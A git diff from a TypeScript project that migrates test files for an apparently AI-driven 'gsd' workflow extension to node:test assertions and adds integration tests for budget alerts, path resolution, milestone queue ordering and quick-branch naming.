     makeUnit({ type: "execute-task", id: "M001/S01/T01", cost: 0.10 }),
     makeUnit({ type: "execute-task", id: "M001/S01/T02", cost: 0.15 }),
@@ -268,30 +258,27 @@ console.log("\n=== E2E: Budget prediction across milestones ===");
   ];
 
   const avgCosts = getAverageCostPerUnitType(units);
-  assertTrue(avgCosts.has("execute-task"), "prediction: has execute-task average");
-  assertTrue(avgCosts.has("plan-slice"), "prediction: has plan-slice average");
+  assert.ok(avgCosts.has("execute-task"), "prediction: has execute-task average");
+  assert.ok(avgCosts.has("plan-slice"), "prediction: has plan-slice average");
 
   // Average execute-task cost: (0.10 + 0.15 + 0.20) / 3 = 0.15
   const execAvg = avgCosts.get("execute-task")!;
-  assertTrue(Math.abs(execAvg - 0.15) < 0.001, `prediction: execute-task avg is $0.15 (got ${execAvg})`);
+  assert.ok(Math.abs(execAvg - 0.15) < 0.001, `prediction: execute-task avg is $0.15 (got ${execAvg})`);
 
   // Average plan-slice cost: (0.05 + 0.08) / 2 = 0.065
   const planAvg = avgCosts.get("plan-slice")!;
-  assertTrue(Math.abs(planAvg - 0.065) < 0.001, `prediction: plan-slice avg is $0.065 (got ${planAvg})`);
+  assert.ok(Math.abs(planAvg - 0.065) < 0.001, `prediction: plan-slice avg is $0.065 (got ${planAvg})`);
 
   // Predict remaining cost for 3 more execute-tasks and 1 plan-slice
   const remaining = predictRemainingCost(avgCosts, [
     "execute-task", "execute-task", "execute-task", "plan-slice",
   ]);
   // Expected: 3 * 0.15 + 1 * 0.065 = 0.515
-  assertTrue(Math.abs(remaining - 0.515) < 0.001, `prediction: remaining cost ~$0.515 (got ${remaining})`);
-}
+  assert.ok(Math.abs(remaining - 0.515) < 0.001, `prediction: remaining cost ~$0.515 (got ${remaining})`);
+});
 
 // ─── E2E: Parallel workers + budget alerts combined scenario ──────────────────
-
-console.log("\n=== E2E: Combined parallel workers + budget monitoring ===");
-
-{
+test('E2E: Combined parallel workers + budget monitoring', () => {
   resetWorkerRegistry();
 
   // Simulate a scenario: 3 parallel workers running while budget is at 78%
@@ -303,34 +290,31 @@ console.log("\n=== E2E: Combined parallel workers + budget monitoring ===");
   // Budget is at 78% — no alert yet (between 75 and 80)
   const ceiling = 10.0;
   let lastLevel: ReturnType<typeof getBudgetAlertLevel> = 75; // already got 75% alert
-  assertEq(getNewBudgetAlertLevel(lastLevel, 7.8 / ceiling), null, "combined: no alert at 78% with workers running");
-  assertTrue(hasActiveWorkers(), "combined: workers running during budget check");
+  assert.deepStrictEqual(getNewBudgetAlertLevel(lastLevel, 7.8 / ceiling), null, "combined: no alert at 78% with workers running");
+  assert.ok(hasActiveWorkers(), "combined: workers running during budget check");
 
   // First worker completes, cost rises to 80%
   updateWorker(w1, "completed");
   const level80 = getNewBudgetAlertLevel(lastLevel, 8.0 / ceiling);
-  assertEq(level80, 80, "combined: 80% approach alert fires after worker completes");
+  assert.deepStrictEqual(level80, 80, "combined: 80% approach alert fires after worker completes");
   lastLevel = level80!;
 
   // Second worker completes, cost rises to 88%
   updateWorker(w2, "completed");
-  assertEq(getNewBudgetAlertLevel(lastLevel, 8.8 / ceiling), null, "combined: no alert at 88%");
+  assert.deepStrictEqual(getNewBudgetAlertLevel(lastLevel, 8.8 / ceiling), null, "combined: no alert at 88%");
 
   // Third worker completes, cost reaches 90%
   updateWorker(w3, "completed");
   const level90 = getNewBudgetAlertLevel(lastLevel, 9.0 / ceiling);
-  assertEq(level90, 90, "combined: 90% alert fires after all workers complete");
+  assert.deepStrictEqual(level90, 90, "combined: 90% alert fires after all workers complete");
 
-  assertTrue(!hasActiveWorkers(), "combined: no active workers at end");
+  assert.ok(!hasActiveWorkers(), "combined: no active workers at end");
 
   resetWorkerRegistry();
-}
+});
 
 // ─── E2E: formatCostProjection with budget ceiling warnings ───────────────────
-
-console.log("\n=== E2E: Cost projection ceiling warnings ===");
-
-{
+test('E2E: Cost projection ceiling warnings', () => {
   const slices = [
     { sliceId: "M001/S01", units: 4, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, cost: 3.0, duration: 10000 },
     { sliceId: "M001/S02", units: 3, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, cost: 4.0, duration: 8000 },
@@ -339,16 +323,15 @@ console.log("\n=== E2E: Cost projection ceiling warnings ===");
 
   // With ceiling NOT yet reached
   const proj1 = formatCostProjection(slices, 2, 20.0);
-  assertTrue(proj1.length >= 1, "projection: has projection line");
-  assertMatch(proj1[0], /Projected remaining/, "projection: shows projection");
-  assertTrue(proj1.length === 1, "projection: no ceiling warning when under budget");
+  assert.ok(proj1.length >= 1, "projection: has projection line");
+  assert.match(proj1[0], /Projected remaining/, "projection: shows projection");
+  assert.ok(proj1.length === 1, "projection: no ceiling warning when under budget");
 
   // With ceiling reached (spent 12.0 >= ceiling 10.0)
   const proj2 = formatCostProjection(slices, 2, 10.0);
-  assertTrue(proj2.length >= 2, "projection: has ceiling warning when over budget");
-  assertMatch(proj2[1], /ceiling/, "projection: ceiling warning text");
-}
+  assert.ok(proj2.length >= 2, "projection: has ceiling warning when over budget");
+  assert.match(proj2[1], /ceiling/, "projection: ceiling warning text");
+});
 
 // ─── Summary ──────────────────────────────────────────────────────────────────
-
-report();
+});
diff --git a/src/resources/extensions/gsd/tests/integration/paths.test.ts b/src/resources/extensions/gsd/tests/integration/paths.test.ts
new file mode 100644
index 000000000..64c186a15
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/paths.test.ts
@@ -0,0 +1,98 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, mkdirSync, rmSync, realpathSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { spawnSync } from "node:child_process";
+
+import { gsdRoot, _clearGsdRootCache } from "../../paths.ts";
+/** Create a tmp dir and resolve symlinks + 8.3 short names (macOS /var→/private/var, Windows RUNNER~1→runneradmin). */
+function tmp(): string {
+  const p = mkdtempSync(join(tmpdir(), "gsd-paths-test-"));
+  try { return realpathSync.native(p); } catch { return p; }
+}
+
+function cleanup(dir: string): void {
+  try { rmSync(dir, { recursive: true, force: true }); } catch { /* ignore */ }
+}
+
+function initGit(dir: string): void {
+  spawnSync("git", ["init"], { cwd: dir });
+  spawnSync("git", ["commit", "--allow-empty", "-m", "init"], { cwd: dir });
+}
+
+describe('paths', () => {
+  test('Case 1: .gsd exists at basePath — fast path', () => {
+    const root = tmp();
+    try {
+      mkdirSync(join(root, ".gsd"));
+      _clearGsdRootCache();
+      const result = gsdRoot(root);
+      assert.deepStrictEqual(result, join(root, ".gsd"), "fast path: returns basePath/.gsd");
+    } finally { cleanup(root); }
+  });
+
+  test('Case 2: .gsd exists at git root, cwd is a subdirectory', () => {
+    const root = tmp();
+    try {
+      initGit(root);
+      mkdirSync(join(root, ".gsd"));
+      const sub = join(root, "src", "deep");
+      mkdirSync(sub, { recursive: true });
+      _clearGsdRootCache();
+      const result = gsdRoot(sub);
+      assert.deepStrictEqual(result, join(root, ".gsd"), "git-root probe: finds .gsd at git root from subdirectory");
+    } finally { cleanup(root); }
+  });
+
+  test('Case 3: .gsd in an ancestor — walk-up finds it', () => {
+    const root = tmp();
+    try {
+      initGit(root);
+      const project = join(root, "project");
+      mkdirSync(join(project, ".gsd"), { recursive: true });
+      const deep = join(project, "src", "deep");
+      mkdirSync(deep, { recursive: true });
+      _clearGsdRootCache();
+      const result = gsdRoot(deep);
+      assert.deepStrictEqual(result, join(project, ".gsd"), "walk-up: finds .gsd in ancestor when git root has none");
+    } finally { cleanup(root); }
+  });
+
+  test('Case 4: .gsd nowhere — fallback returns original basePath/.gsd', () => {
+    const root = tmp();
+    try {
+      initGit(root);
+      const sub = join(root, "src");
+      mkdirSync(sub, { recursive: true });
+      _clearGsdRootCache();
+      const result = gsdRoot(sub);
+      assert.deepStrictEqual(result, join(sub, ".gsd"), "fallback: returns basePath/.gsd when .gsd not found anywhere");
+    } finally { cleanup(root); }
+  });
+
+  test('Case 5: cache — second call returns same value without re-probing', () => {
+    const root = tmp();
+    try {
+      mkdirSync(join(root, ".gsd"));
+      _clearGsdRootCache();
+      const first = gsdRoot(root);
+      const second = gsdRoot(root);
+      assert.deepStrictEqual(first, second, "cache: same result returned on second call");
+      assert.ok(first === second, "cache: identity check (same string)");
+    } finally { cleanup(root); }
+  });
+
+  test('Case 6: .gsd at basePath takes precedence over ancestor .gsd', () => {
+    const outer = tmp();
+    try {
+      initGit(outer);
+      mkdirSync(join(outer, ".gsd"));
+      const inner = join(outer, "nested");
+      mkdirSync(join(inner, ".gsd"), { recursive: true });
+      _clearGsdRootCache();
+      const result = gsdRoot(inner);
+      assert.deepStrictEqual(result, join(inner, ".gsd"), "precedence: nearest .gsd wins over ancestor");
+    } finally { cleanup(outer); }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/plugin-importer-live.test.ts b/src/resources/extensions/gsd/tests/integration/plugin-importer-live.test.ts
similarity index 99%
rename from src/resources/extensions/gsd/tests/plugin-importer-live.test.ts
rename to src/resources/extensions/gsd/tests/integration/plugin-importer-live.test.ts
index 6971a6209..7288ac4a7 100644
--- a/src/resources/extensions/gsd/tests/plugin-importer-live.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/plugin-importer-live.test.ts
@@ -11,8 +11,8 @@
 
 import { describe, it, before, after } from 'node:test';
 import assert from 'node:assert';
-import { PluginImporter, type DiscoveryResult, type ImportManifest } from '../plugin-importer.js';
-import { getMarketplaceFixtures } from './marketplace-test-fixtures.js';
+import { PluginImporter, type DiscoveryResult, type ImportManifest } from '../../plugin-importer.js';
+import { getMarketplaceFixtures } from '../marketplace-test-fixtures.ts';
 
 // ============================================================================
 // Live Test Configuration
diff --git a/src/resources/extensions/gsd/tests/integration/queue-completed-milestone-perf.test.ts b/src/resources/extensions/gsd/tests/integration/queue-completed-milestone-perf.test.ts
new file mode 100644
index 000000000..0f88cf69d
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/queue-completed-milestone-perf.test.ts
@@ -0,0 +1,155 @@
+/**
+ * Regression test for #2379: /gsd queue fails with 429 rate limit on projects
+ * with many completed milestones.
+ *
+ * The bug: buildExistingMilestonesContext iterates over ALL milestones
+ * (including completed ones) and calls loadFile for CONTEXT, SUMMARY,
+ * CONTEXT-DRAFT, and ROADMAP files on each — causing excessive I/O that
+ * triggers rate limits on large projects.
+ *
+ * The fix: completed milestones should emit a short summary line without
+ * loading their heavy artifact files (CONTEXT.md, SUMMARY.md, etc.).
+ */
+
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { buildExistingMilestonesContext } from "../../guided-flow-queue.ts";
+import type { GSDState, MilestoneRegistryEntry } from "../../types.ts";
+import { createTestContext } from "../test-helpers.ts";
+
+const { assertTrue, assertEq, report } = createTestContext();
+
+// ─── Fixture: project with many completed milestones ─────────────────────
+
+const tmpBase = mkdtempSync(join(tmpdir(), "gsd-queue-perf-"));
+const gsd = join(tmpBase, ".gsd");
+mkdirSync(join(gsd, "milestones"), { recursive: true });
+
+const COMPLETED_COUNT = 25;
+const ACTIVE_COUNT = 1;
+const PENDING_COUNT = 2;
+
+const allMilestoneIds: string[] = [];
+const registry: MilestoneRegistryEntry[] = [];
+
+// Create 25 completed milestones with CONTEXT.md and SUMMARY.md files
+for (let i = 1; i <= COMPLETED_COUNT; i++) {
+  const mid = `M${String(i).padStart(3, "0")}`;
+  allMilestoneIds.push(mid);
+  registry.push({ id: mid, title: `Completed milestone ${i}`, status: "complete" });
+  mkdirSync(join(gsd, "milestones", mid), { recursive: true });
+  writeFileSync(
+    join(gsd, "milestones", mid, `${mid}-CONTEXT.md`),
+    `# ${mid}: Completed milestone ${i}\n\nThis is a large context document for ${mid}.\n${"Lorem ipsum dolor sit amet. ".repeat(50)}\n`,
+  );
+  writeFileSync(
+    join(gsd, "milestones", mid, `${mid}-SUMMARY.md`),
+    `# ${mid} Summary\n\nDelivered feature ${i} successfully.\n`,
+  );
+}
+
+// Create 1 active milestone
+{
+  const mid = `M${String(COMPLETED_COUNT + 1).padStart(3, "0")}`;
+  allMilestoneIds.push(mid);
+  registry.push({ id: mid, title: "Active milestone", status: "active" });
+  mkdirSync(join(gsd, "milestones", mid), { recursive: true });
+  writeFileSync(
+    join(gsd, "milestones", mid, `${mid}-CONTEXT.md`),
+    `# ${mid}: Active milestone\n\nCurrently in progress.\n`,
+  );
+  writeFileSync(
+    join(gsd, "milestones", mid, `${mid}-ROADMAP.md`),
+    `# ${mid} Roadmap\n\nSlices planned.\n`,
+  );
+}
+
+// Create 2 pending milestones
+for (let i = 0; i < PENDING_COUNT; i++) {
+  const mid = `M${String(COMPLETED_COUNT + ACTIVE_COUNT + 1 + i).padStart(3, "0")}`;
+  allMilestoneIds.push(mid);
+  registry.push({ id: mid, title: `Pending milestone ${i + 1}`, status: "pending" });
+  mkdirSync(join(gsd, "milestones", mid), { recursive: true });
+  writeFileSync(
+    join(gsd, "milestones", mid, `${mid}-CONTEXT.md`),
+    `# ${mid}: Pending milestone ${i + 1}\n\nQueued work.\n`,
+  );
+}
+
+const state: GSDState = {
+  activeMilestone: { id: `M${String(COMPLETED_COUNT + 1).padStart(3, "0")}`, title: "Active milestone" },
+  activeSlice: null,
+  activeTask: null,
+  phase: "executing",
+  recentDecisions: [],
+  blockers: [],
+  nextAction: "",
+  registry,
+};
+
+// ─── Test: completed milestones should NOT have their files loaded ────────
+
+console.log("\n=== Queue completed milestone performance (#2379) ===");
+
+const context = await buildExistingMilestonesContext(tmpBase, allMilestoneIds, state);
+
+// Active and pending milestones SHOULD have full context loaded
+const activeMid = `M${String(COMPLETED_COUNT + 1).padStart(3, "0")}`;
+assertTrue(
+  context.includes("Currently in progress"),
+  "Active milestone context content should be loaded",
+);
+assertTrue(
+  context.includes("Slices planned"),
+  "Active milestone roadmap should be loaded",
+);
+
+for (let i = 0; i < PENDING_COUNT; i++) {
+  const mid = `M${String(COMPLETED_COUNT + ACTIVE_COUNT + 1 + i).padStart(3, "0")}`;
+  assertTrue(
+    context.includes(`Pending milestone ${i + 1}`),
+    `Pending milestone ${mid} context should be loaded`,
+  );
+}
+
+// Completed milestones should NOT have their CONTEXT.md body or SUMMARY.md
+// content loaded — only a status line
+for (let i = 1; i <= COMPLETED_COUNT; i++) {
+  const mid = `M${String(i).padStart(3, "0")}`;
+
+  // Should still mention the milestone ID and status
+  assertTrue(
+    context.includes(mid),
+    `Completed milestone ${mid} should still be referenced`,
+  );
+
+  // Should NOT contain the heavy context body text
+  assertTrue(
+    !context.includes(`This is a large context document for ${mid}`),
+    `Completed milestone ${mid} should NOT have its full CONTEXT.md body loaded`,
+  );
+
+  // Should NOT contain the summary body
+  assertTrue(
+    !context.includes(`Delivered feature ${i} successfully`),
+    `Completed milestone ${mid} should NOT have its SUMMARY.md body loaded`,
+  );
+}
+
+// ─── Test: the overall context should be reasonable in size ──────────────
+
+// With 25 completed milestones NOT loading files, the context should be
+// significantly smaller than if all files were loaded
+const contextLines = context.split("\n").length;
+assertTrue(
+  contextLines < 200,
+  `Context should be concise (got ${contextLines} lines); completed milestones should not inflate it`,
+);
+
+// ─── Cleanup ──────────────────────────────────────────────────────────────
+
+rmSync(tmpBase, { recursive: true, force: true });
+
+report();
diff --git a/src/resources/extensions/gsd/tests/queue-reorder-e2e.test.ts b/src/resources/extensions/gsd/tests/integration/queue-reorder-e2e.test.ts
similarity index 71%
rename from src/resources/extensions/gsd/tests/queue-reorder-e2e.test.ts
rename to src/resources/extensions/gsd/tests/integration/queue-reorder-e2e.test.ts
index bf86c360a..f479673a5 100644
--- a/src/resources/extensions/gsd/tests/queue-reorder-e2e.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/queue-reorder-e2e.test.ts
@@ -11,18 +11,16 @@
  * 4. A fresh deriveState() call (simulating new session) also works
  */
 
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync, readFileSync, existsSync } from 'node:fs';
 import { join } from 'node:path';
 import { tmpdir } from 'node:os';
 
-import { deriveState, invalidateStateCache } from '../state.ts';
-import { findMilestoneIds } from '../guided-flow.ts';
-import { saveQueueOrder, loadQueueOrder } from '../queue-order.ts';
-import { parseContextDependsOn } from '../files.ts';
-import { createTestContext } from './test-helpers.ts';
-
-const { assertEq, assertTrue, report } = createTestContext();
-
+import { deriveState, invalidateStateCache } from '../../state.ts';
+import { findMilestoneIds } from '../../guided-flow.ts';
+import { saveQueueOrder, loadQueueOrder } from '../../queue-order.ts';
+import { parseContextDependsOn } from '../../files.ts';
 // ─── Fixture Helpers ───────────────────────────────────────────────────────
 
 function createFixtureBase(): string {
@@ -70,8 +68,9 @@ function readContextFile(base: string, mid: string): string {
 // Test: Queue order changes milestone activation
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== E2E: queue-order changes active milestone ===');
-{
+
+describe('queue-reorder-e2e', () => {
+test('E2E: queue-order changes active milestone', async () => {
   const base = createFixtureBase();
   try {
     // Setup: M007 complete, M008 and M009 pending (no context, no roadmap)
@@ -84,7 +83,7 @@ console.log('\n=== E2E: queue-order changes active milestone ===');
     // Without custom order: M008 comes first (numeric sort)
     invalidateStateCache();
     const stateBefore = await deriveState(base);
-    assertEq(stateBefore.activeMilestone?.id, 'M008', 'before reorder: M008 is active');
+    assert.deepStrictEqual(stateBefore.activeMilestone?.id, 'M008', 'before reorder: M008 is active');
 
     // Save custom order: M009 before M008
     saveQueueOrder(base, ['M009', 'M008']);
@@ -92,25 +91,23 @@ console.log('\n=== E2E: queue-order changes active milestone ===');
     // With custom order: M009 should be active
     invalidateStateCache();
     const stateAfter = await deriveState(base);
-    assertEq(stateAfter.activeMilestone?.id, 'M009', 'after reorder: M009 is active');
+    assert.deepStrictEqual(stateAfter.activeMilestone?.id, 'M009', 'after reorder: M009 is active');
 
     // findMilestoneIds respects the order
     const ids = findMilestoneIds(base);
     const m008Idx = ids.indexOf('M008');
     const m009Idx = ids.indexOf('M009');
-    assertTrue(m009Idx < m008Idx, 'findMilestoneIds: M009 comes before M008');
+    assert.ok(m009Idx < m008Idx, 'findMilestoneIds: M009 comes before M008');
 
   } finally {
     cleanup(base);
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Test: Reorder + depends_on removal = correct state
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== E2E: reorder with depends_on removal ===');
-{
+test('E2E: reorder with depends_on removal', async () => {
   const base = createFixtureBase();
   try {
     // Setup: M007 complete, M008 depends_on M009, M009 no deps
@@ -121,7 +118,7 @@ console.log('\n=== E2E: reorder with depends_on removal ===');
     // Before: M008 depends on M009, so deriveState skips M008, M009 is active
     invalidateStateCache();
     const stateBefore = await deriveState(base);
-    assertEq(stateBefore.activeMilestone?.id, 'M009', 'before: M009 active (M008 dep-blocked)');
+    assert.deepStrictEqual(stateBefore.activeMilestone?.id, 'M009', 'before: M009 active (M008 dep-blocked)');
 
     // Simulate reorder confirm: save order M009→M008, remove depends_on from M008
     saveQueueOrder(base, ['M009', 'M008']);
@@ -134,29 +131,27 @@ console.log('\n=== E2E: reorder with depends_on removal ===');
     // Verify: depends_on is gone
     const updatedContent = readContextFile(base, 'M008');
     const deps = parseContextDependsOn(updatedContent);
-    assertEq(deps.length, 0, 'depends_on removed from M008-CONTEXT.md');
+    assert.deepStrictEqual(deps.length, 0, 'depends_on removed from M008-CONTEXT.md');
 
     // Verify: deriveState still picks M009 (it's first in queue order)
     invalidateStateCache();
     const stateAfter = await deriveState(base);
-    assertEq(stateAfter.activeMilestone?.id, 'M009', 'after: M009 still active (first in queue)');
+    assert.deepStrictEqual(stateAfter.activeMilestone?.id, 'M009', 'after: M009 still active (first in queue)');
 
     // Verify: M008 is now pending (not dep-blocked)
     const m008Entry = stateAfter.registry.find(m => m.id === 'M008');
-    assertEq(m008Entry?.status, 'pending', 'M008 is pending (not dep-blocked)');
-    assertTrue(!m008Entry?.dependsOn || m008Entry.dependsOn.length === 0, 'M008 has no dependsOn');
+    assert.deepStrictEqual(m008Entry?.status, 'pending', 'M008 is pending (not dep-blocked)');
+    assert.ok(!m008Entry?.dependsOn || m008Entry.dependsOn.length === 0, 'M008 has no dependsOn');
 
   } finally {
     cleanup(base);
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Test: Fresh deriveState (simulating new session) respects queue order
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== E2E: fresh session respects queue order ===');
-{
+test('E2E: fresh session respects queue order', async () => {
   const base = createFixtureBase();
   try {
     writeCompleteMilestone(base, 'M007');
@@ -171,23 +166,21 @@ console.log('\n=== E2E: fresh session respects queue order ===');
 
     // Derive state — should read QUEUE-ORDER.json from disk
     const state = await deriveState(base);
-    assertEq(state.activeMilestone?.id, 'M009', 'fresh session: M009 is active');
+    assert.deepStrictEqual(state.activeMilestone?.id, 'M009', 'fresh session: M009 is active');
 
     // Verify queue order persisted
     const order = loadQueueOrder(base);
-    assertEq(order, ['M009', 'M008'], 'QUEUE-ORDER.json persisted correctly');
+    assert.deepStrictEqual(order, ['M009', 'M008'], 'QUEUE-ORDER.json persisted correctly');
 
   } finally {
     cleanup(base);
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Test: Queue order with newly added milestones
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== E2E: new milestones appended to queue ===');
-{
+test('E2E: new milestones appended to queue', async () => {
   const base = createFixtureBase();
   try {
     writeCompleteMilestone(base, 'M007');
@@ -207,24 +200,22 @@ console.log('\n=== E2E: new milestones appended to queue ===');
     const m009Idx = ids.indexOf('M009');
     const m008Idx = ids.indexOf('M008');
     const m010Idx = ids.indexOf('M010');
-    assertTrue(m009Idx < m008Idx, 'M009 before M008');
-    assertTrue(m008Idx < m010Idx, 'M008 before M010 (new milestone appended)');
+    assert.ok(m009Idx < m008Idx, 'M009 before M008');
+    assert.ok(m008Idx < m010Idx, 'M008 before M010 (new milestone appended)');
 
     // M009 is still active (first non-complete in queue order)
     const state = await deriveState(base);
-    assertEq(state.activeMilestone?.id, 'M009', 'M009 still active after M010 added');
+    assert.deepStrictEqual(state.activeMilestone?.id, 'M009', 'M009 still active after M010 added');
 
   } finally {
     cleanup(base);
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Test: No queue order file = default numeric sort (backward compat)
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== E2E: backward compat without QUEUE-ORDER.json ===');
-{
+test('E2E: backward compat without QUEUE-ORDER.json', async () => {
   const base = createFixtureBase();
   try {
     writeCompleteMilestone(base, 'M007');
@@ -234,22 +225,20 @@ console.log('\n=== E2E: backward compat without QUEUE-ORDER.json ===');
     // No QUEUE-ORDER.json — default numeric sort
     invalidateStateCache();
     const state = await deriveState(base);
-    assertEq(state.activeMilestone?.id, 'M008', 'no queue order: M008 active (numeric)');
+    assert.deepStrictEqual(state.activeMilestone?.id, 'M008', 'no queue order: M008 active (numeric)');
 
     const ids = findMilestoneIds(base);
-    assertTrue(ids.indexOf('M008') < ids.indexOf('M009'), 'default sort: M008 before M009');
+    assert.ok(ids.indexOf('M008') < ids.indexOf('M009'), 'default sort: M008 before M009');
 
   } finally {
     cleanup(base);
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Test: non-milestone directories are filtered out (#1494)
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== E2E: non-milestone directories filtered from findMilestoneIds (#1494) ===');
-{
+test('E2E: non-milestone directories filtered from findMilestoneIds (#1494)', () => {
   const base = createFixtureBase();
   try {
     writeContext(base, 'M001', '', 'First');
@@ -260,22 +249,20 @@ console.log('\n=== E2E: non-milestone directories filtered from findMilestoneIds
 
     invalidateStateCache();
     const ids = findMilestoneIds(base);
-    assertEq(ids.length, 2, 'only M001 and M002 returned');
-    assertTrue(!ids.includes('slices'), 'slices directory excluded');
-    assertTrue(!ids.includes('temp-backup'), 'temp-backup directory excluded');
-    assertTrue(ids.includes('M001'), 'M001 included');
-    assertTrue(ids.includes('M002'), 'M002 included');
+    assert.deepStrictEqual(ids.length, 2, 'only M001 and M002 returned');
+    assert.ok(!ids.includes('slices'), 'slices directory excluded');
+    assert.ok(!ids.includes('temp-backup'), 'temp-backup directory excluded');
+    assert.ok(ids.includes('M001'), 'M001 included');
+    assert.ok(ids.includes('M002'), 'M002 included');
   } finally {
     cleanup(base);
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Test: depends_on inline array format removal
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== E2E: depends_on inline format preserved after partial removal ===');
-{
+test('E2E: depends_on inline format preserved after partial removal', () => {
   const base = createFixtureBase();
   try {
     writeCompleteMilestone(base, 'M007');
@@ -287,7 +274,7 @@ console.log('\n=== E2E: depends_on inline format preserved after partial removal
     // Verify both deps are parsed
     const contentBefore = readContextFile(base, 'M008');
     const depsBefore = parseContextDependsOn(contentBefore);
-    assertEq(depsBefore.length, 2, 'M008 has 2 deps before');
+    assert.deepStrictEqual(depsBefore.length, 2, 'M008 has 2 deps before');
 
     // Simulate removing only M009 dep (keep M010)
     const content = readContextFile(base, 'M008');
@@ -297,12 +284,52 @@ console.log('\n=== E2E: depends_on inline format preserved after partial removal
     // Verify only M010 remains
     const contentAfter = readContextFile(base, 'M008');
     const depsAfter = parseContextDependsOn(contentAfter);
-    assertEq(depsAfter.length, 1, 'M008 has 1 dep after removal');
-    assertEq(depsAfter[0], 'M010', 'remaining dep is M010');
+    assert.deepStrictEqual(depsAfter.length, 1, 'M008 has 1 dep after removal');
+    assert.deepStrictEqual(depsAfter[0], 'M010', 'remaining dep is M010');
 
   } finally {
     cleanup(base);
   }
-}
+});
 
-report();
+test('E2E: DB-backed path respects queue order (#2556)', async () => {
+    // Regression test for #2556: getActiveMilestoneId and deriveStateFromDb
+    // used lexicographic sort instead of queue order, causing a deadlock when
+    // the dispatch guard (which respects queue order) blocked completion.
+    const base = createFixtureBase();
+    try {
+      const { openDatabase, closeDatabase, insertMilestone, isDbAvailable } = await import('../../gsd-db.ts');
+      const dbPath = join(base, '.gsd', 'gsd.db');
+
+      // Create milestone directories (required for findMilestoneIds)
+      writeMilestoneDir(base, 'M006');
+      writeContext(base, 'M006', '', 'Earlier milestone');
+      writeMilestoneDir(base, 'M008');
+      writeContext(base, 'M008', '', 'Later milestone');
+
+      // Open DB and insert milestones
+      openDatabase(dbPath);
+      try {
+        insertMilestone({ id: 'M006', title: 'Earlier', status: 'active' });
+        insertMilestone({ id: 'M008', title: 'Later', status: 'active' });
+
+        // Set queue order: M008 should come FIRST (user reordered via /gsd queue)
+        saveQueueOrder(base, ['M008', 'M006']);
+
+        // deriveState should pick M008 (queue-first), not M006 (ID-first)
+        invalidateStateCache();
+        const state = await deriveState(base);
+        assert.equal(
+          state.activeMilestone?.id,
+          'M008',
+          'DB-backed deriveState must respect queue order — M008 is queued first',
+        );
+      } finally {
+        if (isDbAvailable()) closeDatabase();
+      }
+    } finally {
+      cleanup(base);
+    }
+});
+
+});
diff --git a/src/resources/extensions/gsd/tests/quick-branch-lifecycle.test.ts b/src/resources/extensions/gsd/tests/integration/quick-branch-lifecycle.test.ts
similarity index 73%
rename from src/resources/extensions/gsd/tests/quick-branch-lifecycle.test.ts
rename to src/resources/extensions/gsd/tests/integration/quick-branch-lifecycle.test.ts
index 79d44f116..a4d77703b 100644
--- a/src/resources/extensions/gsd/tests/quick-branch-lifecycle.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/quick-branch-lifecycle.test.ts
@@ -7,16 +7,15 @@
  * Relates to #1269, #1293.
  */
 
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync, existsSync, readFileSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 import { execSync } from "node:child_process";
 
-import { createTestContext } from './test-helpers.ts';
-import { captureIntegrationBranch, getCurrentBranch } from "../worktree.ts";
-import { readIntegrationBranch, QUICK_BRANCH_RE } from "../git-service.ts";
-
-const { assertEq, assertTrue, report } = createTestContext();
+import { captureIntegrationBranch, getCurrentBranch } from "../../worktree.ts";
+import { readIntegrationBranch, QUICK_BRANCH_RE } from "../../git-service.ts";
 
 function run(command: string, cwd: string): string {
   return execSync(command, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
@@ -35,68 +34,59 @@ function createTestRepo(): string {
   return repo;
 }
 
-async function main(): Promise<void> {
-
   // ═══════════════════════════════════════════════════════════════════════
   // QUICK_BRANCH_RE
   // ═══════════════════════════════════════════════════════════════════════
 
-  console.log("\n=== QUICK_BRANCH_RE: matches quick-task branches ===");
 
-  assertTrue(QUICK_BRANCH_RE.test("gsd/quick/1-fix-typo"), "matches standard quick branch");
-  assertTrue(QUICK_BRANCH_RE.test("gsd/quick/42-some-long-slug-name"), "matches multi-digit quick branch");
-  assertTrue(!QUICK_BRANCH_RE.test("main"), "rejects main");
-  assertTrue(!QUICK_BRANCH_RE.test("gsd/M001/S01"), "rejects slice branch");
-  assertTrue(!QUICK_BRANCH_RE.test("gsd/quickly-something"), "rejects non-quick prefix");
-  assertTrue(!QUICK_BRANCH_RE.test("feature/gsd/quick/1"), "rejects nested prefix");
+describe('quick-branch-lifecycle', () => {
+test('QUICK_BRANCH_RE: matches quick-task branches', () => {
+  assert.ok(QUICK_BRANCH_RE.test("gsd/quick/1-fix-typo"), "matches standard quick branch");
+});
 
